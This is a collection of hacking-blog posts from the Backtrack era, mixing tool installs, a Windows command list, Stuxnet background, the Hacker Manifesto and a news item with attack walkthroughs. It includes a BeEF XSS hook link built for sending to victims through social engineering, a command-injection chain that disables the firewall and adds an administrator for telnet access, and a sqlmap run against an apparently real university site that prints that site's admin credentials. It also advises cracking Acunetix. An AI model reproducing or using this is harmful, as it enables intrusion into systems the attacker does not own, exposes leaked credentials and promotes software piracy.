Installing Nessus on Backtrack 5R3

Hello Friends,

Today i am showing how to install Nessus on Backtrack 5 R3

First go to the Nessus Website and register by clicking here

the Activation code will be send to your e-mail ID, Now take the Activation code

Open an new terminal in Backtrack 5R3  and type the following command to download the Nessus

apt-get install nessus

after complete download next type this command

root@bt:/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

it will take some time so that the plugins will be updated

Now add an user to the Nessus by using this command,

root@bt:/opt/nessus/sbin/nessus-adduser

now it will ask for username and password,after entering the username and password you have to start the nessus by typing the following command.

root@bt:/etc/init.d/nessusd start

it will start the nessus, now open the browser and type the following command in the URL of the browser

https://localhost:8834/

The nessus will run on the secure channel https and on the port number 8834

Bydefault the nessus will run on port number 8834

after installing you just have to run


Thank you.

Read more...

How to Run "C Program" in Linux

Hello friends,

sometimes we need to run the C programs in the Linux Box,

Today i am showing you people how to run an "C language program" from the Linux System.

In linux we can use the gcc command to run C programs

Most of the time by default the gcc installed in the linux.

Type the following command to verify the gcc is installed :

which gcc

output

/usr/bin/gcc

To find the version of the gcc

gcc --verision

output

gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Writing first program:

Open the vi editor

$vi Hello.c

and type the following lines of code

#include<stdio.h>
main (void)
{
    printf("Hello World");
    return 0;
}

Compiling Program

Compile the program and make executable

$gcc Hello.c -o Hello

To execute the program

$./Hello

Output

Hello World

Read more...

BeEF Lab

Hello friends

we seen how to start and test BeEF in the previous post. Now in this post we will be seeing how to work with XSS Vulnerability by using BeEF Framework.

Lab Setting:

1.XP Virtual Machine (Victim)
2.Backtrack VM (Attacker)

Attacker:

1.Start BeEF in the Backtrack.

Now we will get the UI URL and the HOOK URL

2.Open the browser (any browser but firefox is preferable)

3.Copy the UI URL from the terminal and paste it in a URL of a browser http://192.168.0.103:3000/ui/panel

4.Now you will get the login screen of beef

5.Enter the username and password as beef/beef

6.Take any site that is vulnerable to xss ex: demo.testfire.net

7.Check for the cross site scripting vulnerability with simple script <script>alert(123);</script>

8.paste that script in the search box of demo.testfire.net

9.See if you are getting the pop up box or not

10.see the URL in the website http://demo.testfire.net/search.aspx?txtSearch=<script>alert(123);</script>

11.Frame the URL with like this <script src=http://192.168.0.103:3000/hook.js></script>

http://demo.testfire.net/search.aspx?txtSearch=<script src=http://192.168.0.103:3000/hook.js></script>

12.perform some social engineering to send the link to victim by using the mail or chat

Victim:

1.Now victim open the link the attacker sended nothing changed, the page is as usual

Attacker:

when ever the victim opens that link check in the beef user interface

the beef will create a zombie of victim system

click on the zombie which created

Go to the Commands tab --> Misc --> Raw javascript --> Execute

and see in the victim machine i.e,XP

now u can execute what ever the commands u want on the victim machine.

in the next post i will show how to integrate the metasploit with the beef framework

thank u

Read more...

BeEF - Browser Exploitation Framework

BeEF is the Browser Exploitation Framework. The BeEF is an powerful security Framework. It Mainly focuses on the browser based exploits.



If you want to see the real exploitaiton with the XSS(Cross Site Scripting) the beef can be good one. By using Beef we can see what we can do with the XSS Vulnerability.

How to start with BEEF

In Backtrack Beef is already there but before that you have to install it once

Applications --> Backtrack --> Exploitation Tools --> Social Engineering Tools --> Beef XSS Framework --> Beef installer

You will be getting this screen

Applications --> Backtrack --> Exploitation Tools --> Social Engineering Tools --> Beef XSS Framework --> Beef

Dont close this terminal place like that only

The default username/password is beef/beef

Copy the UI URL and paste that in the Attacker Browser

and we will get an beef authentication page

the username and password is beef/beef

After login we will get this page

For checking

http://192.168.0.107:3000/demos/basic.html

Just place this in another tab

and see in the hooked browser section

after that we will get all the details of the hooked browser and we can execute the scripts

In the next article we will see how to exploit the XSS Vulnerability using BeEF Framework

More information on BeEF

http://www.bindshell.net/tools/beef.html

http://beefproject.com/

Read more...

Acunetix

Hello Friends today we are seeing the popular web application scanner called Acunetix,

The Acunetix is one of the best web application scanners,

we are having a lot of other scanners like

IBM Appscan,

Acunetix

HPWeb Inspect

Netsparker

W3af

In this only the w3af is the opensource web application scanner that is freely available with the Backtrack 5

comming to the Acunetix here i am showing the Acunetix version 7 and how to install and use it

go and search the google for the Acunetix version 7 and crack

after that install the accunetix and crack

Now we will start scan a website and search for vulnerabilities

First go to New Scan ->

you will be getting this screen

The scan type you have to enter

we are having different scan types like

1.want to scan for single URL

2.you can the crawled results for scanning

3.Want to scan for more than one URL, then we have to give it in a file and provide it as input

now we are scanning a single URL

I am taking an URL http://www.testasp.vulnweb.com

just click on next we can check our website is running or not

we will get the banner of the server like Server Operationg System and web server and language used to develop the website etc..

then the scanner asks for the crawling options see each and every option and check the box

Now when we click on next scan options will be there

we are having three types of scan options

1.Quick

2.Heuristic

3.Extensive

The Quick scan will wont give much correct results

The Extensive will take a lot of time to scan

so we will go for the Heuristic scan

Then it will show the final screen and we will go for scanning

Then Scanning starts

Then Happy Scanning

In my next post i will show how to test for the vulnerabilities using the Accunetix

Good Bye

Read more...

Command Execution Vulnerability Exploitation

Today i will be showing how to hack the website with the command execution vulnerability.

we will be see this on the DVWA

What is Command Execution ?

OS command injection is a technique used via a web interface in order to execute OS commands on a web server.

The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.

*** In the previous article i written how to access the dvwa from the backtrack that is installed in XP machine

Practical:

1.Take XP machine and the Backtrack Machine

2.Enter the ip of the XP machine and the dvwa

http://192.168.25.54/dvwa

the dvwa will open and go to command execution

3.The DVWA website asked to enter the IP to ping

so enter the 127.0.0.1(Your IP)

its pingging so its cool ..

4.Now try to execute the dir command ..

boom.......

got an error whats the problem ..

it only allows you to execute the ping command not any other then

how to bypass this

we can bypass this by using && or |(pipe) symbol

5. Now lets try this command

127.0.0.1 && dir  ( or)

127.0.0.1 | dir   ( or)

 | dir

means just pipe and command

ok its executed, now try to find the ip of remote system

127.0.0.1 | ifconfig

Now if u want to find the files in the system32 directory then

127.0.0.1 && cd ../../../../../windows/system32 & dir

Now you can access what ever files you require from the system

What else we can do with Command Execution

Normally i am executing the command like this

| dir

but after this i want to take shell of the remote computer, we are having different ways i am showing one

1.so what i do is i disabled the firewall by executing the windows commands

To disable the windows XP firewall

    netsh firewall set opmode disable

In your command execution type as "| netsh firewall set opmode disable" (without quotes)
   
To enable the windows XP firewall

    netsh firewall set opmode enable
   
2. After that i want to start the service which is help ful for me, so i started the TELNET service by using the following commands

To start the TELNET service from command prompt

    sc config tlntsvr start= auto (Hit Enter)

    net start telnet

In your command execution type as "| sc config tlntsvr start= auto" (without quotes)

    | net start telnet

3.so i want to access the remote PC with the help of Telnet but it will ask the login and password

so i added 1 user from cmd prompt only

To add new user from command prompt

    net user /add user1 Ab12345

In your command execution type as "| net user /add user1 Ab12345" (without quotes)

4.Now i am the user but not having prievilages to access the telnet so thats why i added this user to the Administrators group for admin prievilages

    net localgroup administrators user1 /add

In your command execution type as "| net localgroup administrators user1 /add" (without quotes)   

5.I started a terminal in the backtrack and try to connect with the telnet

After that now i connected with the telnet

    telnet 192.168.x.x
   
    login:user1
    password:Ab12345

Boooooooooooooooom...............
   
Got the shell of the remote computer

    c:\>

Read more...

Access DVWA from Backtrack

Hi,

Today i will show you, How to access the DVWA(Damn Vulnerable Web Application) that is installed on the xp machine from the backtrack

1.First we require the XP machine and Backtrack machine in same network means

if the XP machine ip is 192.168.0.22

then backtrack should also be in the same network like 192.168.0.56

2.Install the XAMPP in the XP macine and start the services like Apache and Mysql

3. Download the DVWA(Damn Vulnerable Web Application) from http://sourceforge.net/projects/dvwa/  and paste in the c:/xampp/htdocs/

4. Now go to the dvwa folder and open the .htaccess file with notepad

5.Move to last and place a hash(#) before the "Deny from all"

and write "Allow from all in the next line"

6.Now go to the backtrack and in the browser type the ip of XP machine

http://192.168.0.22/dvwa

7.now you can access the dvwa easily as from remote

Thank You.

Read more...

Installing Google Chrome in Backtrack 5

Friends ,

Many asking how to install the Google chrome browser in the backtrack 5, today we will be seeing how to install that



Let us see the steps

1.In the root type as

apt-get install chromium-browser

2.change to chrome-browser directory

 cd /usr/lib/chromium-browser

3.Type the following command

 hexedit chromium-browser

4.You will be getting the hex-code ,

Here you have to search for geteuid and replace with getppid


press TAB and search (CTRL+S) for geteuid and change it to getppid and press CTRL+X ,

it will ask to save or not press 'Y' and close the terminal

and go to the Applications --> Internet --> Chromium Browser

and check whether the browser installed properly or not and enjoy the Backtrack.

Read more...

Stuxnet

Stuxnet --

Stuxnet is an Computer Worm discovered in the year of June 2010, that is initially spreading via windows machines and targeting the Siemens Systems. it is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit.

The worm will spread very fastly and it is mainly target to the Siemens SCADA(supervisory control and data acquisition) Systems that are configured to control and monitor specific industrial processes. It mainly infects the PLC in the SCADA Systems.

when security Expers find to try the sources of the Stuxnet they found that the some sources are in belaraus and the spreading of worm is mostly in Iran i.e..more than 60 % and it mainly infects the iran nuclear program, which uses embargoed Siemens equipment procured secretly, has been damaged by Stuxnet.

The affected countries

Iran - 58.8%
India - 8 %
USA - 1%

The worm itself now appears to have included two major components. One was designed to send Iran’s nuclear centrifuges spinning wildly out of control. Another seems right out of the movies: The computer program also secretly recorded what normal operations at the nuclear plant looked like, then played those readings back to plant operators, like a pre-recorded security tape in a bank heist, so that it would appear that everything was operating normally while the centrifuges were actually tearing themselves apart

About two years ago, centrifuges at Iran’s uranium enrichment facility at Natanz started failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts said it was the handiwork of the Stuxnet code, and that it destroyed more than 1,000 centrifuges. Many believe the U.S., in conjunction with Israel, sabotaged the system.

Ralph Langner, a well-respected expert on industrial systems security, published an analysis of the worm, which targets Siemens software systems, and suggested that it may have been used to sabotage Iran's Bushehr nuclear reactor. A Siemens expert, Langner simulated a Siemens industrial network and then analyzed the worm's attack.

See Stuxnet: a Good Idea

on 1 september 2011 security experts found an virus related to the family of stuxnet and they call it as 'DUQU' . it is designed to capture information like keystrokes and system information.

Read more...

Basic Commands for Windows

Hello Friends,

for all your reference i am placing some basic windows commands.

Quote:
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt


Run Commands to access the control panel:[b]

Quote:

Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl


A
------------------------------------------------------
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

B
------------------------------------------------------
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

C
------------------------------------------------------
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data

D
------------------------------------------------------
DATE Display or set the date
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
DSRM Remove items from Active Directory

E
------------------------------------------------------
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the current script/routine and set an errorlevel
EXPAND Uncompress files
EXTRACT Uncompress CAB files

F
------------------------------------------------------
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

G
------------------------------------------------------
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

H
------------------------------------------------------
HELP Online Help

I
------------------------------------------------------
iCACLS Change file and folder permissions
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

K
------------------------------------------------------
KILL Remove a program from memory

L
------------------------------------------------------
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGOFF Log a user off
LOGTIME Log the date and time in a file

M
------------------------------------------------------
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

N
------------------------------------------------------
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

P
------------------------------------------------------
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

Q
------------------------------------------------------
QGREP Search file(s) for lines that match a given pattern

R
------------------------------------------------------
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files
REPLACE Replace or update one file with another
RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

S
------------------------------------------------------
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

T
------------------------------------------------------
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

U
------------------------------------------------------
USRSTAT List domain usernames and last login

V
------------------------------------------------------
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

W
------------------------------------------------------
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

X
------------------------------------------------------
XCACLS Change file and folder permissions
XCOPY Copy files and folders

Read more...

What is Hacking

                    The word "hacking" has two definitions. The first definition refers to the hobby/profession of working with computers. The second definition refers to breaking into computer systems. While the first definition is older and is still used by many computer enthusiasts (who refer to cyber-criminals as "crackers"), the second definition is much more commonly used. In particular, the web pages here refer to "hackers" simply because our web-server logs show that every one who reaches these pages are using the second definition as part of their search criteria.

Today the culture is such that hacker is automatically thought as a criminal who had done some crime using computers while that is not the case.Hacking generally refers to one who enjoys programming and finding security problems with system.Hackers are of different categories based upon their deeds:

1.WHITE HAT HACKERS

                     White Hat is a general term used in computer/hacking arena which is used to describe a security expert in penetration testing and programming.White Hats gain permission from the administrator or owner before trying to hack their website/program.They are very well reputed group and are the most trusted ones. They generally work under computer security companies and do no illegal work.According to history, Most White hats have earlier been Black Hats[discussed below].The only problem with being a white hat is that you will have very less freedom and enjoyment in hacking would be lost.

2.BLACK HAT HACKERS

                    Black Hat is your bad guy.He is the guy who acts maliciously with his skills.These guys Hack into computers without prior permission with an intention of earning something from it or just damaging it.They are proficient in using their skills for network hacking and creating computer viruses.Although he is your typical bad guy but he is the most knowledgeable one.DUe to his freedom of mind he is experimental and does not hesitate to test his skills or viruses on other peoples system.Even sometimes FBI calls for Black Hats help when they need to hack a very secure network.But most Black Hats often land in Prison.Due to their bad image they are often hated by society and sent to prison if found.

3. GRAY HAT HACKERS

                  These are the guys in between white and black hats.There categorization depends on variety of spectra and they often get mingled with Black Hats.This type of a guy discover a vulnerability and inform both hacker community and the owner of it.Gray hat may hack into a system unauthorized but they do not cause any damage.Except they sell the vulnerability to the owner or just inform them.Gray hats are the most disputed ones for their work as they sometimes are categorized with White hat and sometimes with Black Hats.Read the proper use of term Gray Hat Here

NOW, that you know the difference between different type of hackers,you might have been starting to think that what type of hacker you would become.I say, DONT THINK NOW.You can't decide what type of hacker you would ultimately be known as.It will be based on variety of speculations and your deeds over time.

Now before ending this chapter, i will have to describe The Hacker Manifesto.The Hacker Manifesto) is a small essay written January 8, 1986 by a very popular hacker who was called as THE MENTOR.It was written soon after he was arrested and this essay was published in Phrack first.It is one of the most famous hacker anthem and you must know about it before you proceed.
-----------------------------------------------------------------------------------------------------------------------------

Quote:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

\/\The Conscience of a Hacker/\/
by
+++The Mentor+++
Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's techno brain,
ever take a look behind the eyes of the hacker? Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain
for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals. We explore... and you call us criminals. We seek
after knowledge... and you call us criminals. We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.

+++The Mentor+++

Read more...

Interpol swoop nets 25 suspected 'Anonymous' hackers

Interpol has arrested 25 suspected members of the 'Anonymous' hackers group in a swoop on over a dozen cities in Europe and Latin America, the global police body said Tuesday.

"Operation Unmask was launched in mid-February following a series of coordinated cyber-attacks originating from Argentina, Chile, Colombia and Spain," said the world police body based in the French city of Lyon.

The statement cited attacks on the websites of the Colombian Ministry of Defence and the presidency, as well as on Chile's Endesa electricity company and its National Library, among others.

The operation was carried out by police from Argentina, Chile, Colombia and Spain, the statement said, with 250 items of computer equipment and mobile phones seized in raids on 40 premises in 15 cities.

Police also seized credit cards and cash from the suspects, aged 17 to 40.

"This operation shows that crime in the virtual world does have real consequences for those involved, and that the Internet cannot be seen as a safe haven for criminal activity," said Interpol's acting director of police services.

However, it was not clear what evidence there was to prove those arrested were part of Anonymous, an extremely loose-knit international movement of online activists, or "hacktivists."

Spanish police said earlier they had arrested four suspected hackers accused of sabotaging websites and publishing confidential data on the Internet.

They were accused of hacking political parties' and companies' websites and adding fangs to the faces of leaders in photographs online, and publishing data identifying top officials' security guards, Spanish police said.

The operation, carried out after trawling through computer logs in order to trace IP addresses, also netted 10 suspects in Argentina, six in Chile and five in Colombia, Spanish police said.

They said one of the suspects went by the nicknames Thunder and Pacotron and was suspected of running the computer network used by Anonymous in Spain and Latin America, via servers in the Czech Republic and Bulgaria.

He was arrested in the southern Spanish city of Malaga.

Two of the suspects were in detention while one was bailed and the fourth was a minor who was left in the care of his parents.

Read more...

SQLmap Step By Step Tutorial

Today we will see the step-by-step tutorial of Sqlmap.
Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is is best sql injection tool.

With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool

Steps:

1.First we require the vulnerable target and here it is

http://www.hu.edu.pk/viewfaculty.php?id=12

2.Go to Backtrack and type cd /pentest/database/sqlmap

3.Run the sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db

if you write as --dbs then it will fetch all the databases in the server

and if you write --current-db then it will fetch only the database related to the current website

we will get the database name

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables

Here after -D we have to give the database name

--tables means we are trying to fetch the tables in the current database

and we will get the table names

after that we have to fetch only the table information which we required

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

we will get the names of columns in that table with datatype

 

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump

now we will get the total information in the table "admin"

After finishing all the process you r having




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123


Now you are having admin username and admin password , find the Admin Panel and  :)

Read more...